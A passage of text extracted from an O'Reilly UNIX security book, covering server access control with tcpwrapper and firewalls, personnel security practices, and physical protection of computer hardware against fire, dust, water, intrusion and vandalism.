such as Kerberos and DCE are not in widespread use, address-based authentication is the<br />

only choice available at most sites.<br />

There are several techniques that you can use for controlling access to servers that do not provide their<br />

own systems for access control. These include:<br />

●<br />

●<br />

The tcpwrapper program written by Wietse Venema. tcpwrapper is a simple utility program that<br />

can be "wrapped" around existing <strong>Internet</strong> servers. The program allows you to restrict servers<br />

according to connecting host, and a number of other parameters. This program also allows<br />

incoming connections to be logged via syslog. It is described in Chapter 22, Wrappers and Proxies.<br />

You can place a firewall between your server and the outside network. A firewall can protect an<br />

entire network, whereas tcpwrapper can only protect services on a specific machine.<br />

Unfortunately, most firewalls do not allow the fine-grained control that tcpwrapper permits, and<br />

do not permit the logging of accepted or rejected connections. Firewalls are described in Chapter<br />

21, Firewalls.<br />

We see tcpwrapper and firewalls as complementary technologies, rather than competing ones. For<br />

example, you can run tcpwrapper on each of your computers, and then you protect your entire network<br />

with a firewall. This combination is an example of defense in depth, the philosophy of not depending on<br />

one particular technology for all your protection.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_02.htm (1 of 2) [2002-04-12 10:44:21]


[Chapter 17] 17.2 Controlling Access to Servers<br />

17.1 Understanding <strong>UNIX</strong><br />

<strong>Internet</strong> Servers<br />

17.3 Primary <strong>UNIX</strong> Network<br />

Services<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_02.htm (2 of 2) [2002-04-12 10:44:21]


[Chapter 13] 13.2 On the Job<br />

13.2 On the Job<br />

Chapter 13<br />

Personnel <strong>Sec</strong>urity<br />

Your security concerns with an employee should not stop after that person is hired.<br />

13.2.1 Initial Training<br />

Every potential computer user should undergo fundamental education in security policy as a matter of<br />

course. At the least, this education should include procedures for password selection and use, physical<br />

access to computers, backup procedures, dial-in policies, and the policies for divulging information over<br />

the telephone. Executives should not be excluded from these classes because of their status - they are as<br />

likely (or more likely) as other personnel to pick poor passwords and commit other errors. They, too,<br />

must demonstrate their commitment to security: security consciousness flows from the top down, not the<br />

other way.<br />

Education should include written materials and a copy of the computer-use policy. The education should<br />

include discussion of appropriate and inappropriate use of the computers and networks, personal use of<br />

computing equipment (during and after hours), policy on ownership and use of electronic mail, and<br />

policies on the import and export of software and papers. Penalties for violations of these policies should<br />

also be detailed.<br />

All users should sign a form acknowledging the receipt of this information, and their acceptance of its<br />

restrictions. These forms should be retained. Later, if any question arises as to whether the employee was<br />

given prior warning about what was allowed, there will be proof.<br />

13.2.2 Ongoing Training and Awareness<br />

Periodically, users should be presented with refresher information about security and appropriate use of<br />

the computers. This retraining is an opportunity to explain good practice, remind users of current threats<br />

and their consequences, and provide a forum to air questions and concerns.<br />

Your staff should also be given adequate opportunities for ongoing training. This training should include<br />

support to attend professional conferences and seminars, to subscribe to professional and trade<br />

periodicals, and to obtain reference books and other training materials. Your staff must also be given<br />

sufficient time to make use of the material, and positive incentives to master it.<br />

Coupled with periodic education, you may wish to employ various methods of continuing awareness.<br />

These methods could include putting up posters or notices about good practice,[1] having periodic<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch13_02.htm (1 of 4) [2002-04-12 10:44:21]


[Chapter 13] 13.2 On the Job<br />

messages of the day with tips and reminders, having an "Awareness Day" every few months, or having<br />

other events to keep security from fading into the background.<br />

[1] If you do this, change them periodically. A poster or notice that has not changed in many<br />

months becomes invisible.<br />

Of course, the nature of your organization, the level of threat and possible loss, and the size and nature of<br />

your user population should all be factored into your plans. The cost of awareness activities should also<br />

be considered and budgeted in advance.<br />

13.2.3 Performance Reviews and Monitoring<br />

The performance of your staff should be reviewed periodically. In particular, the staff should be given<br />

credit and rewarded for professional growth and good practice. At the same time, problems should be<br />

identified and addressed in a constructive manner. You must encourage staff members to increase their<br />

abilities and enhance their understanding.<br />

You also want to avoid creating situations in which staff members feel overworked, underappreciated, or<br />

ignored. Creating such a working environment can lead to carelessness and a lack of interest in<br />

protecting the interests of the organization. The staff could also leave for better opportunities. Or worse,<br />

the staff could become involved in acts of disruption as a matter of revenge. Overtime must be an<br />

exception and not the rule, and all employees-especially those in critical positions-must be given<br />

adequate holiday and vacation time.<br />

In general, users with privileges should be monitored for signs of excessive stress, personal problems, or<br />

other indications of difficulties. Identifying such problems and providing help, where possible, is at the<br />

very least humane. Such practice is also a way to preserve valuable resources - the users themselves, and<br />

the resources to which they have access. A user under considerable financial or personal stress might<br />

spontaneously take some action that he would never consider under more normal situations...and that<br />

action might be damaging to your operations.<br />

13.2.4 Auditing Access<br />

Ensure that auditing of access to equipment and data is enabled, and is monitored. Furthermore, ensure<br />

that anyone with such access knows that auditing is enabled. Many instances of computer abuse are<br />

spontaneous in nature. If a possible malefactor knows that the activity and access are logged, he might be<br />

discouraged in his actions.<br />

13.2.5 Least Privilege and Separation of Duties<br />

Consider carefully the time-tested principles of least privilege and separation of duties. These should be<br />

employed wherever practical in your operations.<br />

Least privilege<br />

This principle states that you give each person the minimum access necessary to do his or her job.<br />

This restricted access is both logical (access to accounts, networks, programs) and physical (access<br />

to computers, backup tapes, and other peripherals). If every user has accounts on every system and<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch13_02.htm (2 of 4) [2002-04-12 10:44:21]


[Chapter 13] 13.2 On the Job<br />

has physical access to everything, then all users are roughly equivalent in level of threat.<br />

Separation of duties<br />

This principle states that you should carefully separate duties so that people involved in checking<br />

for inappropriate use are not also capable of making such inappropriate use. Thus, having all the<br />

security functions and audit responsibilities reside in the same person is dangerous. This practice<br />

can lead to a case in which the person may violate security policy and commit prohibited acts, yet<br />

in which no other person sees the audit trail to be alerted to the problem.<br />

Beware Key Employees<br />

No one in an organization should be irreplaceable, because no human is immortal. If your organization<br />

depends on the ongoing performance of a key employee, then your organization is at risk.<br />

Organizations cannot help but have key employees. To be secure, organizations should have written<br />

policies and plans established for unexpected illness or departure.<br />

In one case that we are familiar with, a small company with 100 employees had spent more than 10 years<br />

developing its own custom-written accounting and order entry system. The system was written in a<br />

programming language that was not readily known, originally provided by a company that had possibly<br />

gone out of business. Two people understood the organization's system: the MIS director and her<br />

programmer. These two people were responsible for making changes to the account system's programs,<br />

preparing annual reports, repairing computer equipment when it broke, and even performing backups<br />

(which were stored, off-site, at the MIS director's home office).<br />

What would happen if the MIS director and her programmer were killed one day in a car accident on<br />

their way to meet with a vendor? What would happen if the MIS director were offered a better job, at<br />

twice the salary?<br />

That key personnel are irreplaceable is one of the real costs associated with computer systems - one that<br />

is rarely appreciated by an organization's senior management. The drawbacks of this case illustrate one<br />

more compelling reason to use off-the-shelf software, and to have established written policies and<br />

procedures, so that a newly hired replacement can easily fill another's shoes.<br />

13.2.6 Departure<br />

Personnel leave, sometimes on their own, and sometimes involuntarily. In either case, you should have a<br />

defined set of actions for how to handle the departure. This procedure should include shutting down<br />

accounts; forwarding email; changing critical passwords, phone numbers, and combinations; and<br />

otherwise removing access to your systems.<br />

In some environments, this suggestion may be too drastic. In the case of a university, for instance,<br />

graduated students might be allowed to keep accounts active for months or years after they leave. In such<br />

cases, you must determine exactly what access is to be allowed and what access is to be disallowed.<br />

Make certain that the personnel involved know exactly what the limits are.<br />

In other environments, a departure is quite sudden and dramatic. Someone may show up at work, only to<br />

find the locks changed and a security guard waiting with a box containing everything that was in the<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch13_02.htm (3 of 4) [2002-04-12 10:44:21]


[Chapter 13] 13.2 On the Job<br />

user's desk drawers. The account has already been deleted; all system passwords have been changed; and<br />

the user's office phone number is no longer assigned. This form of separation management is quite<br />

common in financial service industries, and is understood to be part of the job.<br />

13.1 Background Checks 13.3 Outsiders<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch13_02.htm (4 of 4) [2002-04-12 10:44:21]


[Chapter 12] 12.2 Protecting Computer Hardware<br />

Chapter 12<br />

Physical <strong>Sec</strong>urity<br />

12.2 Protecting Computer Hardware<br />

Physically protecting a computer presents many of the same problems that arise when protecting<br />

typewriters, jewelry, and file cabinets. Like a typewriter, an office computer is something that many<br />

people inside the office need to access on an ongoing basis. Like jewelry, computers are very valuable,<br />

and very easy for a thief to sell. But the real danger in having a computer stolen isn't the loss of the<br />

system's hardware but the value of the loss of the data that was stored on the computer's disks. As with<br />

legal files and financial records, if you don't have a backup - or if the backup is stolen with the<br />

computer - the data you have lost may well be irreplaceable. Even if you do have a backup, you will still<br />

need to spend valuable time setting up a replacement system. Finally, there is always the chance that<br />

stolen information itself, or even the mere fact that information was stolen, will be used against you.<br />

Your computers are among the most expensive possessions in your home or office; they are also the<br />

pieces of equipment that you can least afford to lose.[1]<br />

[1] We know of some computer professionals who say, "I don't care if the thief steals my<br />

computer; I just wish that he would first take out the hard drive!" Unfortunately, you can<br />

rarely reason in this manner with would-be thieves.<br />

To make matters worse, computers and computer media are by far the most temperamental objects in<br />

today's home or office. Few people worry that their television sets will be damaged if they're turned on<br />

during a lightning storm, but a computer's power supply can be blown out simply by leaving the machine<br />

plugged into the wall if lightning strikes nearby. Even if the power surge doesn't destroy the information<br />

on your hard disk, it still may make the information inaccessible until the computer system is repaired.<br />

Power surges don't come only during storms: one of the authors once had a workstation ruined because a<br />

vacuum cleaner was plugged into the same outlet as the running workstation: when the vacuum was<br />

switched on, the power surge fatally shorted out the workstation's power supply. Because of the age of<br />

the computer involved, it proved to be cheaper to throw out the machine and lose the data, rather than<br />

attempt to salvage the hardware and information stored on the machine's disk. That was an expensive<br />

form of spring cleaning!<br />

There are several measures that you can take to protect your computer system against physical threats.<br />

Many of them will simultaneously protect the system from dangers posed by nature, outsiders, and inside<br />

saboteurs.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_02.htm (1 of 14) [2002-04-12 10:44:23]


[Chapter 12] 12.2 Protecting Computer Hardware<br />

12.2.1 The Environment<br />

Computers are extremely complicated devices that often require exactly the right balance of physical and<br />

environmental conditions to properly operate. Altering this balance can cause your computer to fail in<br />

unexpected and often undesirable ways. Even worse, your computer might continue to operate, but<br />

erratically, producing incorrect results and corrupting valuable data.<br />

In this respect, computers are a lot like people: they don't work well if they're too hot, too cold, or<br />

submerged in water without special protection.<br />

12.2.1.1 Fire<br />

Computers are notoriously bad at surviving fires. If the flames don't cause your system's case and circuit<br />

boards to ignite, the heat might melt your hard drive and all the solder holding the electronic components<br />

in place. Your computer might even survive the fire, only to be destroyed by the water used to fight the<br />

flames.<br />

You can increase the chances that your computer will survive a fire by making sure that there is good<br />

fire-extinguishing equipment nearby.<br />

In the late 1980s, Halon fire extinguishers were exceedingly popular for large corporate computer rooms.<br />

Halon is a chemical that works by "asphyxiating" the fire's chemical reaction. Unlike water, Halon does<br />

not conduct electricity and leaves no residue, so it will not damage expensive computer systems.<br />

Unfortunately, Halon may also asphyxiate humans in the area. For this reason, all automatic Halon<br />

systems have loud alarms that sound before the Halon is discharged. Halon has another problem as well:<br />

after it is released into the environment, it slowly diffuses into the stratosphere, where it acts as a potent<br />

greenhouse gas and contributes to the destruction of the ozone layer. Halon is therefore being phased out<br />

and replaced with systems that are based on carbon dioxide (CO2), which still asphyxiate fires (and<br />

possibly humans), but which do not cause as much environmental degradation.<br />

Here are some guidelines for fire control:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Make sure that you have a hand-held fire extinguisher by the doorway of your computer room.<br />

Train your computer operators in the proper use of the fire extinguisher. Repeat the training at<br />

least once a year. One good way to do this is to have your employees practice with extinguishers<br />

that need to be recharged (usually once every year or two). However, don't practice indoors!<br />

Check the recharge state of each extinguisher every month. Extinguishers with gauges will show if<br />

they need recharging. All extinguishers should be recharged and examined by a professional on a<br />

periodic basis (sometimes those gauges stick in the "full" position!).<br />

If you have a Halon or CO2 system, make sure everyone who enters the computer room knows<br />

what to do when the alarm sounds. Post warning signs in appropriate places.<br />

If you have an automatic fire-alarm system, make sure you can override it in the event of a false<br />

alarm.<br />

Ensure that there is telephone access for your operators and users who may discover a fire or a<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_02.htm (2 of 14) [2002-04-12 10:44:23]


[Chapter 12] 12.2 Protecting Computer Hardware<br />

false alarm.<br />

Many modern computers will not be damaged by automatic sprinkler systems, provided that the<br />

computer's power is turned off before the water starts to flow (although disks, tapes, and printouts out in<br />

the open may suffer). Consequently, you should have your computer's power automatically cut if the<br />

water sprinkler triggers.[2] Be sure that the computer has completely dried out before the power is<br />

restored. If your water has a very high mineral content, you may find it necessary to have the computer's<br />

circuit boards professionally cleaned before attempting to power up. Remember, getting sensitive<br />

electronics wet is never a good idea.<br />

[2] If you have an uninterruptible power supply, be sure that it is automatically<br />

disconnected, too.<br />

Because many computers can now survive exposure to water, many fire-protection experts now suggest<br />

that a water sprinkler system may be as good as (or better) than a CO2 system. In particular, a water<br />

system will continue to run long after a CO2 system is exhausted, so it's more likely to work against<br />

major fires. They also are less expensive to maintain, and less hazardous to humans.<br />

If you choose to have a water-based sprinkler system installed, be sure it is a "dry-pipe" system. This<br />

keeps water out of the pipes until an alarm is actually triggered, rather than having the sprinkler heads<br />

pressurized all the time. This may save your system from leaks or misfortune.[3]<br />

[3] We know of one instance where a maintenance man accidentally knocked the sprinkler<br />

head off with a stepladder. The water came out in such quantity that the panels for the raised<br />

floor were floating before the water was shut off. The mess took more than a week to clean<br />

up.<br />

Be sure that your wiring, in addition to your computers, is protected. Be certain that smoke detectors and<br />

sprinkler heads are appropriately positioned to cover wires in wiring trays (often above your suspended<br />

ceilings), and in wiring closets.<br />

12.2.1.2 Smoke<br />

Smoke is very good at damaging computer equipment. Smoke is a potent abrasive and collects on the<br />

heads of magnetic disks, optical disks, and tape drives. A single smoke particle can cause a severe disk<br />

crash on some kinds of older disk drives without a sealed drive compartment.<br />

Sometimes smoke is generated by computers themselves. Electrical fires - particularly those caused by<br />

the transformers in video monitors - can produce a pungent, acrid smoke that can damage other<br />

equipment and may also be a potent carcinogen. Several years ago, a laboratory at Stanford had to be<br />

evacuated because of toxic smoke caused by a fire in a single video monitor.<br />

An even greater danger is the smoke that comes from cigarettes and pipes. Such smoke is a health hazard<br />

to people and computers alike. Smoke will cause premature failure of keyboards and require that they be<br />

cleaned more often. Nonsmokers in a smoky environment will not perform as well as they might<br />

otherwise, both in the near term and the long term; and in many locales, smoking in public or semi-public<br />

places is illegal.<br />

Here are some guidelines for smoke control:<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_02.htm (3 of 14) [2002-04-12 10:44:23]


[Chapter 12] 12.2 Protecting Computer Hardware<br />

●<br />

●<br />

●<br />

●<br />

Do not permit smoking in your computer room or around the people who use the computers.<br />

Install smoke detectors in every room with computer or terminal equipment.<br />

If you have a raised floor, mount smoke detectors underneath the floor as well.<br />

If you have suspended ceilings, mount smoke detectors above the ceiling tiles.<br />

Get a Carbon-Monoxide Detector!<br />

Carbon monoxide (CO) won't harm your computer, but it might silently kill any humans in the vicinity.<br />

One of the authors of this book was nearly killed in February 1994 when his home chimney became<br />

plugged and the furnace exhaust started venting into his house. Low-cost carbon monoxide detectors are<br />

readily available. They should be installed wherever coal, oil, or gas-fired appliances are used.<br />

If you think this doesn't apply to your computer environment, think again. Closed office buildings can<br />

build up strong concentrations of CO from faulty heater venting, problems with generator exhaust (as<br />

from a UPS), or even a truck idling outside with its exhaust near the building air intake.<br />

12.2.1.3 Dust<br />

Dust destroys data. As with smoke, dust can collect on the heads of magnetic disks, tape drives, and<br />

optical drives. Dust is abrasive and will slowly destroy both the recording head and the media.<br />

Most dust is electrically conductive. The design of many computers sucks large amounts of air and dust<br />

through the computer's insides for cooling. Invariably, a layer of dust will accumulate on a computer's<br />

circuit boards, covering every surface, exposed and otherwise. Eventually, the dust will cause circuits to<br />

short and fail.<br />

Here are some guidelines for dust control:<br />

●<br />

●<br />

●<br />

●<br />

Keep your computer room as dust free as possible.<br />

If your computer has air filters, clean or replace them on a regular basis.<br />

Get a special vacuum for your computers and use it on a regular basis. Be sure to vacuum behind<br />

your computers. You may also wish to vacuum your keyboards.<br />

In environments with dust that you can't control well, consider getting keyboard dust covers to use<br />

when the keyboards are idle for long periods of time. However, don't simply throw homemade<br />

covers over your computers - doing so can cause the computer to overheat, and some covers can<br />

build up significant static charges.<br />

12.2.1.4 Earthquake<br />

While some parts of the world are subject to frequent and severe earthquakes, nearly every part of the<br />

world experiences the occasional temblor. In the United States, for example, the San Francisco Bay Area<br />

experiences several earthquakes every year; a major earthquake is expected within the next 20 years that<br />

may be equal in force to the great San Francisco earthquake of 1906. Scientists also predict an 80%<br />

chance that the eastern half of the United States may experience a similar earthquake within the next 30<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_02.htm (4 of 14) [2002-04-12 10:44:23]


[Chapter 12] 12.2 Protecting Computer Hardware<br />

years: the only truly unknown factor is where it will occur. As a result, several Eastern cities have<br />

enacted stringent anti-earthquake building codes. These days, many new buildings in Boston are built<br />

with diagonal cross-braces, using construction that one might expect to see in San Francisco.<br />

While some buildings collapse in an earthquake, most remain standing. Careful attention to the<br />

placement of shelves and bookcases in your office can increase the chances that your computers will<br />

survive all but the worst disasters.<br />

Here are some guidelines for earthquake control:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Avoid placing computers on any high surfaces - for example, on top of file cabinets.<br />

Do not place heavy objects on bookcases or shelves near computers in such a way that they might<br />

fall on the computer during an earthquake.<br />

To protect your computers from falling debris, place them underneath strong tables.<br />

Do not place computers on desks next to windows - especially on higher floors. In an earthquake,<br />

the computer could be thrown through the window, destroying the computer, and creating a hazard<br />

for people on the ground below.<br />

Consider physically attaching the computer to the surface on which it is resting. You can use bolts,<br />

tie-downs, straps, or other implements. (This practice also helps deter theft of the equipment.)<br />

12.2.1.5 Explosion<br />

Although computers are not prone to explosion, the buildings in which they are located can be -<br />

especially if a building is equipped with natural gas or is used to store flammable solvents.<br />

If you need to operate a computer in an area where there is a risk of explosion, you might consider<br />

purchasing a system with a ruggedized case. Disk drives can be shock-mounted within a computer; if<br />

explosion is a constant hazard, consider using a ruggedized laptop with an easily removed,<br />

shock-resistant hard drive.<br />

Here are some basic guidelines for explosion control:<br />

●<br />

●<br />

●<br />

Consider the real possibility of explosion on your premises. Make sure that solvents, if present, are<br />

stored in appropriate containers in clean, uncluttered areas.<br />

Keep your backups in blast-proof vaults or off-site.<br />

Keep computers away from windows.<br />

12.2.1.6 Temperature extremes<br />

As with people, computers operate best within certain temperature ranges. Most computer systems<br />

should be kept between 50 and 90 degrees Fahrenheit (10 to 32 degrees Celsius). If the ambient<br />

temperature around your computer gets too high, the computer cannot adequately cool itself, and internal<br />

components can be damaged. If the temperature gets too cold, the system can undergo thermal shock<br />

when it is turned on, causing circuit boards or integrated circuits to crack.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_02.htm (5 of 14) [2002-04-12 10:44:23]


[Chapter 12] 12.2 Protecting Computer Hardware<br />

Here are some basic guidelines for temperature control:<br />

●<br />

●<br />

●<br />

Check your computer's documentation to see what temperature ranges it can tolerate.<br />

Install a temperature alarm in your computer room that is triggered by a temperature that is too low<br />

or too high. Set it to alarm when the temperature gets within 15-20 degrees (F) of the limits your<br />

system can take. Some alarms can even be connected to a phone line, and can be programed to dial<br />

predefined phone numbers and tell you, with a synthesized voice, "your computer room is too hot."<br />

Be careful about placing computers too close to walls, which can interfere with air circulation.<br />

Most manufacturers recommend that their systems have 6 to 12 inches of open space on every<br />

side. If you cannot afford the necessary space, lower the computer's upper-level temperature by 10<br />

degrees Fahrenheit or more.<br />

12.2.1.7 Bugs (biological)<br />

Sometimes insects and other kinds of bugs find their way into computers. Indeed, the very term bug, used<br />

to describe something wrong with a computer program, dates back to the 1950s, when Grace Murray<br />

Hopper found a moth trapped between the relay contacts on Harvard University's Mark 1 computer.<br />

Insects have a strange predilection for getting trapped between the high-voltage contacts of switching<br />

power supplies. Others seem to have insatiable cravings for the insulation that covers wires carrying line<br />

current and the high-pitched whine that switching power supplies emit. Spider webs inside computers<br />

collect dust like a magnet.<br />

12.2.1.8 Electrical noise<br />

Motors, fans, heavy equipment, and even other computers can generate electrical noise that can cause<br />

intermittent problems with the computer you are using. This noise can be transmitted through space or<br />

nearby power lines.<br />

Electrical surges are a special kind of electrical noise that consists of one (or a few) high-voltage spikes.<br />

As we've mentioned, an ordinary vacuum cleaner plugged into the same electrical outlet as a workstation<br />

can generate a spike capable of destroying the workstation's power supply.<br />

Here are some guidelines for electrical noise control:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Make sure that there is no heavy equipment on the electrical circuit that powers your computer<br />

system.<br />

If possible, have a special electrical circuit with an isolated ground installed for each computer<br />

system.<br />

Install a line filter on your computer's power supply.<br />

If you have problems with static, you may wish to install a static (grounding) mat around the<br />

computer's area, or apply antistatic sprays to your carpet.<br />

Walkie-talkies, cellular telephones, and other kinds of radio transmitters can cause computers to<br />

malfunction when they are transmitting. Especially powerful transmitters can even cause<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_02.htm (6 of 14) [2002-04-12 10:44:23]


[Chapter 12] 12.2 Protecting Computer Hardware<br />

permanent damage to systems. Transmitters have also been known to trigger the explosive charges<br />

in some sealed fire- extinguisher systems (e.g., Halon). All radio transmitters should be kept at<br />

least five feet from the computer, cables, and peripherals. If many people in your organization use<br />

portable transmitters, you should consider posting signs instructing them not to transmit in the<br />

computer's vicinity.<br />

12.2.1.9 Lightning<br />

Lightning generates large power surges that can damage even computers whose electrical supplies are<br />

otherwise protected. If lightning strikes your building's metal frame (or hits your building's lightning<br />

rod), the resulting current on its way to ground can generate an intense magnetic field.<br />

Here are some guidelines for lightning control:<br />

●<br />

●<br />

●<br />

●<br />

If possible, turn off and unplug computer systems during lightning storms.<br />

Make sure that your backup tapes, if they are kept on magnetic media, are stored as far as possible<br />

from the building's structural steel members.<br />

Surge suppressor outlet strips will not protect your system from a direct strike, but may help if the<br />

storm is distant. Some surge suppressors include additional protection for sensitive telephone<br />

equipment; this extra protection may be of questionable value in most areas, though, since by law,<br />

telephone circuits must be equipped with lightning arresters.<br />

In remote areas, modems are still damaged by lightning, even though they are on lines equipped<br />

with lightning arresters. In these areas, modems may benefit from additional lightning protection.<br />

12.2.1.10 Vibration<br />

Vibration can put an early end to your computer system by literally shaking it apart. Even gentle<br />

vibration, over time, can work printed circuit boards out of their edge connectors, and integrated circuits<br />

out of their sockets. Vibration can cause hard disk drives to come out of alignment and increase the<br />

chance for catastrophic failure - and resulting data loss.<br />

Here are some guidelines for vibration control:<br />

●<br />

●<br />

●<br />

●<br />

Isolate your computer from vibration as much as possible.<br />

If you are in a high-vibration environment, you can place your computer on a rubber or foam mat<br />

to dampen out vibrations reaching it, but make sure that the mat does not block ventilation<br />

openings.<br />

Laptop computers are frequently equipped with hard disks that are better at resisting vibration than<br />

are desktop machines<br />

Don't put your printer on top of a computer. Printers are mechanical devices; they generate<br />

vibrations. Desktop space may be a problem, but a bigger problem may be the unexpected failure<br />

of your computer's disk drive or system board.<br />

12.2.1.11 Humidity<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_02.htm (7 of 14) [2002-04-12 10:44:23]


[Chapter 12] 12.2 Protecting Computer Hardware<br />

Humidity is your computer's friend - but as with all friends, you can get too much of a good thing.<br />

Humidity prevents the buildup of static charge. If your computer room is too dry, static discharge<br />

between operators and your computer (or between the computer's moving parts) may destroy information<br />

or damage your computer itself. If the computer room is too humid, you may experience condensation on<br />

the computer's circuitry, which can short out and damage the electrical circuits.<br />

Here are some guidelines for humidity control:<br />

●<br />

●<br />

●<br />

For optimal performance, keep the relative humidity of your computer room above 20% and well<br />

below the dew point (which depends on the ambient room temperature).<br />

In environments that require high reliability, you may wish to have a humidity alarm that will ring<br />

when the humidity is out of your acceptable range.<br />

Some equipment has special humidity restrictions. Check your manuals.<br />

12.2.1.12 Water<br />

Water can destroy your computer. The primary danger is an electrical short, which can happen if water<br />

bridges between a circuit-board trace carrying voltage and a trace carrying ground. A short will cause too<br />

much current to be pulled through a trace, and will heat up the trace and possibly melt it. Shorts can also<br />

destroy electronic components by pulling too much current through them.<br />

Water usually comes from rain or flooding. Sometimes it comes from an errant sprinkler system. Water<br />

also may come from strange places, such as a toilet overflowing on a higher floor, vandalism, or the fire<br />

department.<br />

Here are some guidelines for water control:<br />

●<br />

●<br />

●<br />

●<br />

Mount a water sensor on the floor near the computer system.<br />

If you have a raised floor in your computer room, mount water detectors underneath the floor and<br />

above it.<br />

Do not keep your computer in the basement of your building if your area is prone to flooding, or if<br />

your building has a sprinkler system.<br />

Because water rises, you may wish to have two alarms, located at different heights. The first water<br />

sensor should ring an alarm; the second should automatically cut off power to your computer<br />

equipment. Automatic power cutoffs can save a lot of money if the flood happens off-hours, or if<br />

the flood occurs when the person who is supposed to attend to the alarm is otherwise occupied.<br />

More importantly, cutoffs can save lives: electricity, water, and people shouldn't mix.<br />

12.2.1.13 Environmental monitoring<br />

To detect spurious problems, you should continuously monitor and record your computer room's<br />

temperature and relative humidity. As a general rule of thumb, every 1,000 square feet of office space<br />

should have its own recording equipment. Log and check recordings on a regular basis.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_02.htm (8 of 14) [2002-04-12 10:44:23]


[Chapter 12] 12.2 Protecting Computer Hardware<br />

12.2.2 Preventing Accidents<br />

In addition to environmental problems, your computer system is vulnerable to a multitude of accidents.<br />

While it is impossible to prevent all accidents, careful planning can minimize the impact of accidents that<br />

will inevitably occur.<br />

12.2.2.1 Food and drink<br />

People need food and drink to stay alive. Computers, on the other hand, need to stay away from food and<br />

drink. One of the fastest ways of putting a keyboard out of commission is to pour a soft drink or cup of<br />

coffee between the keys. If this keyboard is your system console, you may be unable to reboot the<br />

computer until the console is replaced (we know this from experience).<br />

Food - especially oily food - collects on people's fingers, and from there gets on anything that a person<br />

touches. Often this includes dirt-sensitive surfaces such as magnetic tapes and optical disks. Sometimes<br />

food can be cleaned away; other times it cannot. Oils from foods also tend to get onto screens, increasing<br />

glare and decreasing readability. Some screens (especially some terminals from Digital Equipment<br />

Corporation) are equipped with special quarter-wavelength antiglare coatings: when touched with oily<br />

hands, the fingerprints will glow with an annoying iridescence. Generally, the simplest rule is the safest:<br />

Keep all food and drink away from your computer systems.[4]<br />

[4] Perhaps more than any other rule in this chapter, this rule is honored most often in the<br />

breach.<br />

12.2.3 Physical Access<br />

Simple common sense will tell you to keep your computer in a locked room. But how safe is that room?<br />

Sometimes a room that appears to be quite safe is actually wide open.<br />

12.2.3.1 Raised floors and dropped ceilings<br />

In many modern office buildings, internal walls do not extend above dropped ceilings or beneath raised<br />

floors. This type of construction makes it easy for people in adjoining rooms, and sometimes adjoining<br />

offices, to gain access.<br />

Here are some guidelines for dealing with raised floors and dropped ceilings:<br />

●<br />

●<br />

Make sure that your building's internal walls extend above your dropped ceilings - so that intruders<br />

cannot enter locked offices simply by climbing over the walls.<br />

Likewise, if you have raised floors, make sure that the building's walls extend down to the real<br />

floor.<br />

12.2.3.2 Entrance through air ducts<br />

If the air ducts that serve your computer room are large enough, intruders can use them to gain entrance<br />

to an otherwise secured area.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_02.htm (9 of 14) [2002-04-12 10:44:23]


[Chapter 12] 12.2 Protecting Computer Hardware<br />

Here are some guidelines for dealing with air ducts:<br />

●<br />

●<br />

●<br />

Areas that need large amounts of ventilation should be served by several small ducts, none of<br />

which is large enough for a person to traverse.<br />

As an alternative, screens can be welded over air vents, or even within air ducts, to prevent<br />

unauthorized entry (although screens can be cut).<br />

The truly paranoid administrator may wish to place motion detectors inside air ducts.<br />

12.2.3.3 Glass walls<br />

Although glass walls and large windows frequently add architectural panache, they can be severe<br />

security risks. Glass walls are easy to break; a brick and a bottle of gasoline thrown through a window<br />

can do an incredible amount of damage. Glass walls are also easy to look through: an attacker can gain<br />

critical knowledge, such as passwords or information about system operations, simply by carefully<br />

watching people on the other side of a glass wall or window.<br />

Here are some guidelines for dealing with glass walls:<br />

●<br />

●<br />

Avoid glass walls and windows for security-sensitive areas.<br />

If you must have some amount of translucence, consider walls made of glass blocks.<br />

12.2.4 Vandalism<br />

Computer systems are good targets for vandalism. Reasons for vandalism include:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Intentional disruption of services (e.g., a student who has homework due)<br />

Revenge (e.g., a fired employee)<br />

Riots<br />

Strike-related violence<br />

Entertainment for the feebleminded<br />

Computer vandalism is often fast, easy, and very expensive. Sometimes, vandalism is actually sabotage<br />

presented as random vandalism.<br />

In principle, any part of a computer system - or the building that houses it - may be a target for<br />

vandalism. In practice, some targets are more vulnerable than others. Some are described briefly in the<br />

following sections.<br />

12.2.4.1 Ventilation holes<br />

Several years ago, 60 workstations at the Massachusetts Institute of Technology were destroyed in a<br />

single evening by a student who poured Coca-Cola into each computer's ventilation holes. Authorities<br />

surmised that the vandal was a student who had not completed a problem set due the next day.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_02.htm (10 of 14) [2002-04-12 10:44:23]


